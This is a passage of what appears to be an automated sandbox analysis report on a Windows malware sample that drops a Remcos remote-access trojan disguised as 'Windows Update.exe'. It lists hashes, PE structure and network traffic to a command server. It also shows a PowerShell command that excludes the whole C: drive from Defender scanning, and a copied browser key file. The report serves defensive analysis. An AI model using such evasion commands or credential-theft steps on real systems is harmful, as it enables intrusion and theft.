                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):2351104
                                                                                              Entropy (8bit):7.506766900421548
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:AW3dW0e3O2oWFaLcZig+bnDPXqWtex9vtVl:AW3dWJloWFaLcZig+j2WcxLVl
                                                                                              MD5:32EB10C12A29B38F13730CD1F5DCAD4D
                                                                                              SHA1:4D0EB488A01FED1720483DFA270423BEA593CA14
                                                                                              SHA-256:06550442678FB92B0273B83F349D47D3654FB72A7D98398CE3B63E3635B8E8F1
                                                                                              SHA-512:1E95F1A74B7F2DCDE31B661AAD078373DD757B689EE02E35E36090777A1B92CF7564271FC577DF529C6E7C77B3D294CCE0FD913243A7DF6DC6ACC2F58C2FB6C5
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............i...i...i...d...i.Rich..i.................PE..L...>..V......................#.....L........ ....@...........................#.....[...........................................(....0....#................................................................. ... ....... ............................text...$........................... ..`.data...,.... ......................@....rsrc.....#..0....#.. ..............@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              Process:C:\Users\user\AppData\Local\Temp\rem9090sta.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):474112
                                                                                              Entropy (8bit):6.580639305620245
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:iegN0jfYLclGb0bVT6e+MT2MffZS/gISYo:ENywLclGIeMT2MXZRISV
                                                                                              MD5:083D4CDE33E6721F595A468BB7D17ADA
                                                                                              SHA1:0E2766C31F8DC69A320B6176D62F6784C9F590DD
                                                                                              SHA-256:F636FA169CBB4D9038EA21B5B1258A3AB92BE41BBAB0020C90C8ECBA105616E2
                                                                                              SHA-512:8565B2EFC06D92878E7BB86AB931237CAAA0BC0D10935F4D8380527A1370461C720ADA5B1815099FF4AC0230F203BD0A0BFE9391367CED380587B4C4C1FB04CE
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe, Author: Joe Security
                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exe, Author: unknown
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}4V..gV..gV..g...gD..g...g...g...gH..g_.gW..g.<.gT..gm..fL..gm..fl..gm..ft..g_.gC..gV..g...g...f...g...gW..g...fW..gRichV..g........PE..L...s..a.................,..........r........@....@.................................................................................. ...K...................p..49.. }..8....................}......X}..@............@...............................text....+.......,.................. ..`.rdata...p...@...r...0..............@..@.data....>..........................@....tls................................@....gfids..0...........................@..@.rsrc....K... ...L..................@..@.reloc..49...p...:..................@..B................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                              Process:C:\Users\user\AppData\Local\Temp\5.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                              Category:dropped
                                                                                              Size (bytes):852277
                                                                                              Entropy (8bit):7.535786145318411
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:WOe0qo8EWUK1CLF54EMctn6zleqHXFD/ABuqYrNav+qSz4SglH2zbr:WpZwW9cxjn6z917Nq+BVcSg12r
                                                                                              MD5:3F332B62EEE0970F3189C689D5BD042A
                                                                                              SHA1:F68F7DCC8FFCDD3F93333E711779E8D02DB2DFAE
                                                                                              SHA-256:7C7983ADA08828EA0C0ED5B17B05F8DAD5BF6FA44E1A4692C37F18C340E14219
                                                                                              SHA-512:2399BF335B60B87D1126B7CD663DFD937BE0DA7FEF815225D53940E5D01CF4B02969DC33D75E7B1F5F63B3233ED1EA179CC517C1C4639802293E4EA8CF25D5EF
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.......p....@..........................@...............................................t.......p...............................................................................p...............................text...h[.......\.................. ..`.rdata.......p.......`..............@..@.data...X\...........t..............@....ndata...................................rsrc........p.......x..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                                                              Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                              Category:dropped
                                                                                              Size (bytes):0
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:WOe0qo8EWUK1CLF54EMctn6zleqHXFD/ABuqYrNav+qSz4SglH2zbr:WpZwW9cxjn6z917Nq+BVcSg12r
                                                                                              MD5:3F332B62EEE0970F3189C689D5BD042A
                                                                                              SHA1:F68F7DCC8FFCDD3F93333E711779E8D02DB2DFAE
                                                                                              SHA-256:7C7983ADA08828EA0C0ED5B17B05F8DAD5BF6FA44E1A4692C37F18C340E14219
                                                                                              SHA-512:2399BF335B60B87D1126B7CD663DFD937BE0DA7FEF815225D53940E5D01CF4B02969DC33D75E7B1F5F63B3233ED1EA179CC517C1C4639802293E4EA8CF25D5EF
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Reputation:unknown
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.......p....@..........................@...............................................t.......p...............................................................................p...............................text...h[.......\.................. ..`.rdata.......p.......`..............@..@.data...X\...........t..............@....ndata...................................rsrc........p.......x..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                              C:\Users\user\AppData\Roaming\pid.txt
                                                                                              Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):0
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:t:t
                                                                                              MD5:0D770C496AA3DA6D2C3F2BD19E7B9D6B
                                                                                              SHA1:ECC8960598EECE6384E562B381C74ADBDF84C291
                                                                                              SHA-256:AFCBB3A0B0D252E8EB1F2BA0CCB8BAC1E5A93BEFEA32241BADFBD759713F30FA
                                                                                              SHA-512:5AEB4C71DA76745DEE7D655B996D9D05129B401EB339E474FE713A143CA11245376D52F81B1A54CBDDD2D2EA5AAEE9114DE12A69EC8894AF4DF026CC27BF4F16
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: 6084
                                                                                              C:\Users\user\AppData\Roaming\pidloc.txt
                                                                                              Process:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):0
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:oNt+kiEaKC59KYr4a:oNwknaZ534a
                                                                                              MD5:EAB5D702695BC09B3A1E675917747986
                                                                                              SHA1:CCB1F880801A3826B484428802F66BDCCEDFF0B6
                                                                                              SHA-256:9E90C44A450FAD02151EC509448B88382B55A7CDC65D32EA970B9AE13C909709
                                                                                              SHA-512:7328E450F4E3AE277F5F30BAFC0D7D73835AEC39544A999A2A6D08DC6A20BF83874D7D3C5D8B24764F0C432D9A4F0A697377E27E89A5A4FC260E9041D7CF2EA6
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                              C:\Users\user\AppData\Roaming\w.BmxDA.tmp
                                                                                              Process:C:\Users\user\AppData\Local\Temp\bin.exe
                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):87300
                                                                                              Entropy (8bit):6.102677495198111
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:CdLUGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR1:CdLUFcbXafIB0u1GOJmA3iuR1
                                                                                              MD5:D5D29F3050E6C920ECA7B7276AB537CE
                                                                                              SHA1:CE24853BBE0BCC044B2216385612CBA2A754E4D4
                                                                                              SHA-256:C0963F0007CBC3AA6AA3B9A906173730BB6B7644BE9D3DA903D64B42D4387FDB
                                                                                              SHA-512:3BB59E005958968218FF3763B831B8898C47A6543CD6B017D52DA9176DBE0D6D545F25FB901D11DA2B30D9BA86DCB59E0F295A9C1B14579C8B764849CFB76D8C
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601451012154773e+12,"network":1.601451004e+12,"ticks":765205613.0,"uncertainty":4222325.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245922715401452"},"plugins":{"metadata":{"adobe-flash-player":{"d
                                                                                              C:\Users\user\Documents\20211207\PowerShell_transcript.405464.W_BMIIUL.20211207133845.txt
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):5048
                                                                                              Entropy (8bit):5.3845993980278815
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:BZbj3N5tqDo1ZIZPj3N5tqDo1ZdM6UjZPj3N5tqDo1ZmFEEsZL:rYkV
                                                                                              MD5:7AB83A17940318100C5E2696D22145A0
                                                                                              SHA1:70CCC9767E81FAFC009E592E8452C57D2A66D609
                                                                                              SHA-256:9E269E1D1C01C9E2A987F1FB6B656F3464F3E795F35D9A5209AA749ABAFBE1B2
                                                                                              SHA-512:1CD46D2293F341B559FF2ED8B6278A787ABB56F56D5D08A8E03CAE20FE9F6AD84D05C42EEFB1D4FC23FD834319E04410B9566018D77C5173C103B316635F1C69
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20211207133852..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 405464 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 6324..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211207133852..**********************..PS>Add-MpPreference -ExclusionPath C:\..**********************..Windows PowerShell transcript start..Start time: 20211207134354..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 405464 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -Exclus

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                              Entropy (8bit):7.715929024340085
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:xxTzyGLZx5.exe
                                                                                              File size:833414
                                                                                              MD5:d5f570694f0847caea18ccac8837b052
                                                                                              SHA1:b509737bb61ae0e9dee56ca2706456b3788ce553
                                                                                              SHA256:ea209f6ba95920038ac83985be8bcffc1fda49631ed3142cfdd9f2acd52584b1
                                                                                              SHA512:d742bd5224e03e3cb7639676fab49577b34a0a0bf64359fd0851e7825d3e437d707dde7c4e93091d3fdcf4336a3125870eaead995b6645176f180c4936026068
                                                                                              SSDEEP:12288:O46yDv/k496AZOJnBH92K6UXi6ft27rNG1JbL1pywuWKDaFIMD+o4Sth:OvyQVA+d2K66fgZGDXmWyaFHDtHh
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.....

                                                                                              File Icon

                                                                                              Icon Hash:beeaccc8e8b29aae

                                                                                              Static PE Info

                                                                                              General

                                                                                              Entrypoint:0x4030e3
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                              DLL Characteristics:
                                                                                              Time Stamp:0x48EFCDCD [Fri Oct 10 21:49:01 2008 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:7fa974366048f9c551ef45714595665e

                                                                                              Entrypoint Preview

                                                                                              Instruction
                                                                                              sub esp, 00000180h
                                                                                              push ebx
                                                                                              push ebp
                                                                                              push esi
                                                                                              xor ebx, ebx
                                                                                              push edi
                                                                                              mov dword ptr [esp+18h], ebx
                                                                                              mov dword ptr [esp+10h], 00409158h
                                                                                              xor esi, esi
                                                                                              mov byte ptr [esp+14h], 00000020h
                                                                                              call dword ptr [00407030h]
                                                                                              push 00008001h
                                                                                              call dword ptr [004070B0h]
                                                                                              push ebx
                                                                                              call dword ptr [0040727Ch]
                                                                                              push 00000008h
                                                                                              mov dword ptr [0042EC18h], eax
                                                                                              call 00007F93C4A114F8h
                                                                                              mov dword ptr [0042EB64h], eax
                                                                                              push ebx
                                                                                              lea eax, dword ptr [esp+34h]
                                                                                              push 00000160h
                                                                                              push eax
                                                                                              push ebx
                                                                                              push 00428F90h
                                                                                              call dword ptr [00407158h]
                                                                                              push 0040914Ch
                                                                                              push 0042E360h
                                                                                              call 00007F93C4A111AFh
                                                                                              call dword ptr [004070ACh]
                                                                                              mov edi, 00434000h
                                                                                              push eax
                                                                                              push edi
                                                                                              call 00007F93C4A1119Dh
                                                                                              push ebx
                                                                                              call dword ptr [0040710Ch]
                                                                                              cmp byte ptr [00434000h], 00000022h
                                                                                              mov dword ptr [0042EB60h], eax
                                                                                              mov eax, edi
                                                                                              jne 00007F93C4A0E9DCh
                                                                                              mov byte ptr [esp+14h], 00000022h
                                                                                              mov eax, 00434001h
                                                                                              push dword ptr [esp+14h]
                                                                                              push eax
                                                                                              call 00007F93C4A10C90h
                                                                                              push eax
                                                                                              call dword ptr [0040721Ch]
                                                                                              mov dword ptr [esp+1Ch], eax
                                                                                              jmp 00007F93C4A0EA35h
                                                                                              cmp cl, 00000020h
                                                                                              jne 00007F93C4A0E9D8h
                                                                                              inc eax
                                                                                              cmp byte ptr [eax], 00000020h
                                                                                              je 00007F93C4A0E9CCh
                                                                                              cmp byte ptr [eax], 00000022h
                                                                                              mov byte ptr [eax+eax+00h], 00000000h

                                                                                              Rich Headers

                                                                                              Programming Language:
                                                                                              • [EXP] VC++ 6.0 SP5 build 8804

                                                                                              Data Directories

                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x74b00xb4.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x2b718.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                              Sections

                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x10000x5b680x5c00False0.67722486413data6.48746502716IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                              .rdata0x70000x129c0x1400False0.4337890625data5.04904254867IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .data0x90000x25c580x400False0.58203125data4.76995537906IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                              .ndata0x2f0000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .rsrc0x370000x2b7180x2b800False0.208731815733data5.90932777211IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                              Resources

                                                                                              NameRVASizeTypeLanguageCountry
                                                                                              RT_ICON0x373100x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                              RT_ICON0x47b380x94a8dataEnglishUnited States
                                                                                              RT_ICON0x50fe00x5488dataEnglishUnited States
                                                                                              RT_ICON0x564680x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 224, next used block 251658240EnglishUnited States
                                                                                              RT_ICON0x5a6900x374fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                              RT_ICON0x5dde00x25a8dataEnglishUnited States
                                                                                              RT_ICON0x603880x10a8dataEnglishUnited States
                                                                                              RT_ICON0x614300x988dataEnglishUnited States
                                                                                              RT_ICON0x61db80x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                              RT_DIALOG0x622200x100dataEnglishUnited States
                                                                                              RT_DIALOG0x623200x11cdataEnglishUnited States
                                                                                              RT_DIALOG0x624400x60dataEnglishUnited States
                                                                                              RT_GROUP_ICON0x624a00x84dataEnglishUnited States
                                                                                              RT_MANIFEST0x625280x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                              Imports

                                                                                              DLLImport
                                                                                              KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
                                                                                              USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                              GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                              SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                              ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                              ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                              VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                              Possible Origin

                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              EnglishUnited States

                                                                                              Network Behavior

                                                                                              Snort IDS Alerts

                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                              12/07/21-13:38:54.454328UDP254DNS SPOOF query response with TTL of 1 min. and no authority53591238.8.8.8192.168.2.4
                                                                                              12/07/21-13:40:13.559829TCP1201ATTACK-RESPONSES 403 Forbidden8049769104.16.154.36192.168.2.4

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 7, 2021 13:38:52.147469044 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:52.372756004 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:52.372867107 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:52.749970913 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:52.839741945 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:52.911250114 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:53.206392050 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:53.206512928 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:53.511605024 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:53.636991978 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:53.637271881 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:53.637324095 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:53.831348896 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.062335968 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.062462091 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.062513113 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.062551022 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.062591076 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.062603951 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.062629938 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.062644005 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.062666893 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.062674046 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.062705994 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.062743902 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.062756062 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.062779903 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.062824965 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.265337944 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.265372992 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.265388966 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.265399933 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.265538931 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.265562057 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.265578985 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.265584946 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.265594006 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.265671015 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.265713930 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.265748024 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.265763998 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.265779972 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.265830994 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.265873909 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.265873909 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.265947104 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.265979052 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.266010046 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.266026974 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.266051054 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.266067028 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.266089916 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.266138077 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.266243935 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:38:54.468051910 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.468099117 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.468120098 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.468141079 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.468162060 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:38:54.468183041 CET197549726185.157.161.174192.168.2.4
